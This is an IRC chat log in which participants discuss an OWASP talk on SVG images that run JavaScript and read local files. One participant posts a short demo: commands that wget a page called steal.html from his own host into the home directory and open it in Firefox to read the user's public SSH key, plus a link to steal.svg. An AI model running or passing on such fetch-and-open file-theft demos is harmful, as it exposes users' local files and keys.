- [00:41:37] <Jenda`> https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf
- [00:44:50] <atalax> "Image is an SVG and executes JavaScript locally" "Attacker can read local files (same directory, sub-folders)"
- [00:44:54] <atalax> wtf?!
- [00:50:38] <Jenda`> yes, it works in firefox
- [00:52:27] <Jenda`> at least in html
- [00:52:30] <Jenda`> cd ~
- [00:52:35] <Jenda`> wget -q http://jenda.hrach.eu/steal.html
- [00:52:39] <Jenda`> firefox steal.html
- [00:52:51] <Jenda`> (don't worry, it reads the *public* ssh key)
- [00:53:43] <Mrkva> but I have to save it to ~/
- [00:54:57] <Jenda`> yeah
- [00:58:52] <Jenda`> http://jenda.hrach.eu/steal.svg
- [00:59:01] <Jenda`> nobody expects…
- [00:59:28] <atalax> imho you can also find out some pretty interesting things from the contents of ~/Downloads/